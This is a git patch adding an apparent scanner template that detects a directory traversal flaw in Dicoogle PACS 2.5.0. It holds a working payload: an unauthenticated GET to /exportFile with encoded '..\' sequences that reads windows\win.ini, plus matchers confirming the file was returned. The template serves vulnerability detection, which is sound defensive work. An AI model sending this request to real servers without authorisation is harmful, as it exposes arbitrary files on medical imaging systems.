From 439a1e966a4e83e52c30ac7fbe202b4833b47c97 Mon Sep 17 00:00:00 2001
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Fri, 24 Dec 2021 08:57:26 +0900
Subject: [PATCH] Create dicoogle-pacs-lfi.yaml

---
 dicoogle-pacs-lfi.yaml | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 dicoogle-pacs-lfi.yaml

diff --git a/dicoogle-pacs-lfi.yaml b/dicoogle-pacs-lfi.yaml
new file mode 100644
index 0000000000..8f38c36ece
--- /dev/null
+++ b/dicoogle-pacs-lfi.yaml
@@ -0,0 +1,24 @@
+id: dicoogle-pacs-lfi
+
+info:
+  name: Dicoogle PACS 2.5.0 - Directory Traversal
+  author: 0x_akoko
+  severity: high
+  description: In version 2.5.0, it is vulnerable to local file inclusion. This allows an attacker to read arbitrary files that the web user has access to. Admin credentials aren't required.
+  reference: https://cxsecurity.com/issue/WLB-2018070131
+  tags: windows,lfi,dicoogle
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"
+
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        words:
+          - "bit app support"
+          - "fonts"
+          - "extensions"
+        condition: and
+        part: body